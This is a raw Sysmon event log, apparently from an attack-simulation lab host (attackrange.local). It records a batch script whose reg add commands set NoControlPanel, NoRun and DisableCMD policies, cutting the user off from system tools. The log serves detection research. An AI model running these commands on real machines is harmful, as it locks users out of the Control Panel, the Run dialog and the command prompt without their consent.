12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.596{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.583{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000001) 10341000x80000000000000009438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.586{266CAFBE-6557-6064-3E01-00000000AE01}2688C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.567{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRunDWORD (0x00000001) 10341000x80000000000000009429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.567{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.573{266CAFBE-6557-6064-3D01-00000000AE01}6352C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.536{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMDDWORD (0x00000001) 10341000x80000000000000009420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd